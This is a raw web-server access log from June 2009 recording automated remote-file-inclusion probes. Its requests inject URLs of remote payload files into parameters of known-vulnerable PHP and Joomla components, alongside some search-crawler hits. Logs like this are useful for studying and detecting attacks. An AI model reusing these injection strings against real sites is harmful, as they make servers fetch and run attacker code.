83.16.182.130 - - [27/Jun/2009:06:39:46 -0500] "GET /logs/access_log.1233100800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:46 -0500] "GET /logs/access_log.1235692800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:47 -0500] "GET /logs/access_log.1225584000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:04 -0500] "GET /logs/access_log.1236038400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:13 -0500] "GET /logs/access_log.1234483200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:14 -0500] "GET /logs/access_log.1229731200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:14 -0500] "GET /logs/access_log.1232064000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:21 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:23 -0500] "GET /logs/access_log.1229472000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:33 -0500] "GET /logs/access_log.1235433600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:35 -0500] "GET /logs/access_log.1225065600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:41 -0500] "GET /logs/access_log.1235174400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:40:47 -0500] "GET /logs/access_log.1234310400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:40:47 -0500] "GET ///?custompluginfile[]=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 200 3246 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
85.17.162.28 - - [27/Jun/2009:06:40:47 -0500] "GET /logs/access_log.1233014400///?custompluginfile[]=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
85.17.162.28 - - [27/Jun/2009:06:40:48 -0500] "GET /logs///?custompluginfile[]=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 200 194918 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.16.182.130 - - [27/Jun/2009:06:40:59 -0500] "GET /logs/access_log.1231200000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:41:43 -0500] "GET /logs/access_log.1236816000///?custompluginfile[]=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
85.17.162.28 - - [27/Jun/2009:06:42:08 -0500] "GET /logs/access_log.1233014400///?custompluginfile[]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:42:08 -0500] "GET ///?custompluginfile[]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:42:09 -0500] "GET /logs///?custompluginfile[]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 200 194918 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:42:34 -0500] "GET ///?custompluginfile[]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:42:34 -0500] "GET /logs/access_log.1233014400///?custompluginfile[]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:42:35 -0500] "GET /logs/access_log.1236816000///?custompluginfile[]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:42:35 -0500] "GET /logs///?custompluginfile[]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 200 194918 "-""Mozilla/5.0"
91.198.32.3 - - [27/Jun/2009:06:43:04 -0500] "GET /?sourcedir=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
91.198.32.3 - - [27/Jun/2009:06:43:05 -0500] "GET /logs/?sourcedir=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 200 194912 "-""libwww-perl/5.805"
85.17.162.28 - - [27/Jun/2009:06:43:11 -0500] "GET /logs/access_log.1236816000///?custompluginfile[]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:43:23 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:43:25 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:43:25 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:43:34 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:43:34 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:43:34 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:44:32 -0500] "GET ///?custompluginfile[]=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 200 3246 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
85.17.162.28 - - [27/Jun/2009:06:44:32 -0500] "GET /logs/access_log.1233014400///?custompluginfile[]=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 312 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
85.17.162.28 - - [27/Jun/2009:06:44:33 -0500] "GET /logs///?custompluginfile[]=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 200 194918 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
85.17.162.28 - - [27/Jun/2009:06:45:27 -0500] "GET /logs/access_log.1236816000///?custompluginfile[]=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 312 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
75.125.198.130 - - [27/Jun/2009:06:45:59 -0500] "GET /logs/access_log.1237680000//include/mail.inc.php?skin_board_path=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:45:59 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:45:59 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.63.185.58 - - [27/Jun/2009:06:47:23 -0500] "GET //pollphp/textfile/admin/common.inc.php?base_path=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.63.185.58 - - [27/Jun/2009:06:47:28 -0500] "GET /logs//pollphp/textfile/admin/common.inc.php?base_path=http://kpbclub.ru//components/com_virtuemart/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
209.172.33.230 - - [27/Jun/2009:06:54:41 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:54:41 -0500] "GET /logs/access_log.1239408000//include/mail.inc.php?skin_board_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:54:41 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:54:49 -0500] "GET /logs/access_log.1237680000//include/mail.inc.php?skin_board_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:06:56:54 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:06:56:54 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:06:56:55 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.119.154.129 - - [27/Jun/2009:06:57:52 -0500] "GET /logs/access_log.1236470400//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:58:09 -0500] "GET /errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:58:09 -0500] "GET /logs/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:58:09 -0500] "GET /logs/access_log.1227657600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:59:04 -0500] "GET /logs/access_log.1234224000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
38.103.48.109 - - [27/Jun/2009:06:59:27 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
38.103.48.109 - - [27/Jun/2009:06:59:27 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
75.125.198.130 - - [27/Jun/2009:06:59:56 -0500] "GET /logs/access_log.1239408000//include/mail.inc.php?skin_board_path=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
38.117.93.134 - - [27/Jun/2009:07:00:23 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
38.117.93.134 - - [27/Jun/2009:07:00:23 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
93.188.112.35 - - [27/Jun/2009:07:01:43 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:07:01:43 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:07:01:43 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.106.233 - - [27/Jun/2009:07:02:25 -0500] "GET /logs/access_log.1174176000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.188.112.35 - - [27/Jun/2009:07:03:11 -0500] "GET /logs/access_log.1236470400//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
91.197.128.4 - - [27/Jun/2009:07:06:11 -0500] "GET //show_image_in_imgtag.php?mosConfig_absolute_path=http://izzynet.110mb.com/tcl/fx29id2.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
91.197.128.4 - - [27/Jun/2009:07:06:11 -0500] "GET /logs/access_log.1240531200//show_image_in_imgtag.php?mosConfig_absolute_path=http://izzynet.110mb.com/tcl/fx29id2.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
91.197.128.4 - - [27/Jun/2009:07:06:11 -0500] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://izzynet.110mb.com/tcl/fx29id2.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
91.197.128.4 - - [27/Jun/2009:07:06:15 -0500] "GET /logs/access_log.1239494400//show_image_in_imgtag.php?mosConfig_absolute_path=http://izzynet.110mb.com/tcl/fx29id2.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:07:09:51 -0500] "GET /logs/access_log.1227657600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:07:09:51 -0500] "GET /errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:07:09:51 -0500] "GET /logs/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:07:10:58 -0500] "GET /logs/access_log.1234224000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.137.160.12 - - [27/Jun/2009:07:13:08 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
195.137.160.12 - - [27/Jun/2009:07:13:08 -0500] "GET /logs/access_log.1239753600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
195.137.160.12 - - [27/Jun/2009:07:13:08 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.137.160.12 - - [27/Jun/2009:07:13:17 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:07:17:55 -0500] "GET /logs/components/com_joomlalib/graphs/download.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:07:17:55 -0500] "GET /logs/access_log.1230076800/components/com_joomlalib/graphs/download.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:07:17:56 -0500] "GET /components/com_joomlalib/graphs/download.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:07:17:59 -0500] "GET /components/com_joomlalib/graphs/download.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:07:17:59 -0500] "GET /logs/components/com_joomlalib/graphs/download.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:07:17:59 -0500] "GET /logs/access_log.1230163200/components/com_joomlalib/graphs/download.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:07:17:59 -0500] "GET /logs/access_log.1230076800/components/com_joomlalib/graphs/download.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
80.247.76.181 - - [27/Jun/2009:07:19:27 -0500] "GET /index.php?ipath=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
80.247.76.181 - - [27/Jun/2009:07:19:27 -0500] "GET /logs/index.php?ipath=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
173.15.28.165 - - [27/Jun/2009:07:20:05 -0500] "GET /logs/index.php?ipath=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
217.147.29.190 - - [27/Jun/2009:07:21:19 -0500] "GET /logs/access_log.1230163200/components/com_joomlalib/graphs/download.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:07:22:06 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:07:22:06 -0500] "GET /logs/access_log.1240617600/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:07:22:06 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:07:22:06 -0500] "GET /logs/access_log.1240358400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
65.55.106.219 - - [27/Jun/2009:07:23:23 -0500] "GET /logs/access_log.1206403200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.201.208.50 - - [27/Jun/2009:07:27:46 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:07:27:46 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:07:27:46 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.230.22.39 - - [27/Jun/2009:07:28:00 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.230.22.39 - - [27/Jun/2009:07:28:00 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.230.22.39 - - [27/Jun/2009:07:28:00 -0500] "GET /logs/access_log.1239753600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
87.230.22.39 - - [27/Jun/2009:07:28:01 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
65.55.208.124 - - [27/Jun/2009:07:28:14 -0500] "GET /logs/access_log.1185235200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.17.99.13 - - [27/Jun/2009:07:28:55 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 319 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:07:28:55 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 324 "-""libwww-perl/5.826"
84.201.208.50 - - [27/Jun/2009:07:29:22 -0500] "GET /logs/access_log.1237248000//bbs/outlogin.php?_zb_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
194.109.22.98 - - [27/Jun/2009:07:30:59 -0500] "GET /index.php?ipath=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.816"
194.109.22.98 - - [27/Jun/2009:07:30:59 -0500] "GET /logs/index.php?ipath=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.816"
82.136.20.14 - - [27/Jun/2009:07:32:17 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
82.136.20.14 - - [27/Jun/2009:07:32:17 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
173.1.96.154 - - [27/Jun/2009:07:35:48 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
173.1.96.154 - - [27/Jun/2009:07:35:48 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
210.115.58.73 - - [27/Jun/2009:07:42:31 -0500] "GET /logs/access_log.1241568000/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
210.115.58.73 - - [27/Jun/2009:07:42:32 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
210.115.58.73 - - [27/Jun/2009:07:42:32 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.115.58.73 - - [27/Jun/2009:07:42:42 -0500] "GET /logs/access_log.1242000000/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.106.137 - - [27/Jun/2009:07:48:26 -0500] "GET /logs/access_log.1121817600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.230.156.161 - - [27/Jun/2009:07:54:28 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.230.156.161 - - [27/Jun/2009:07:54:28 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.230.156.161 - - [27/Jun/2009:07:54:28 -0500] "GET /logs/access_log.1241568000/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.230.156.161 - - [27/Jun/2009:07:54:46 -0500] "GET /logs/access_log.1242000000/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.230.156.161 - - [27/Jun/2009:07:55:19 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.230.156.161 - - [27/Jun/2009:07:55:19 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.230.156.161 - - [27/Jun/2009:07:55:19 -0500] "GET /logs/access_log.1241568000/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.230.156.161 - - [27/Jun/2009:07:55:23 -0500] "GET /logs/access_log.1242000000/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.106.239 - - [27/Jun/2009:07:55:54 -0500] "GET /logs/access_log.1146268800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.93.90.155 - - [27/Jun/2009:07:57:38 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
119.93.90.155 - - [27/Jun/2009:07:57:38 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
119.93.90.155 - - [27/Jun/2009:07:57:38 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
119.93.90.155 - - [27/Jun/2009:08:00:08 -0500] "GET /logs/access_log.1237248000//bbs/outlogin.php?_zb_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.107.179 - - [27/Jun/2009:08:02:22 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.107.180 - - [27/Jun/2009:08:07:25 -0500] "GET /logs/access_log.1233446400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.188.112.35 - - [27/Jun/2009:08:08:11 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
93.188.112.35 - - [27/Jun/2009:08:08:11 -0500] "GET /?custompluginfile[]=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
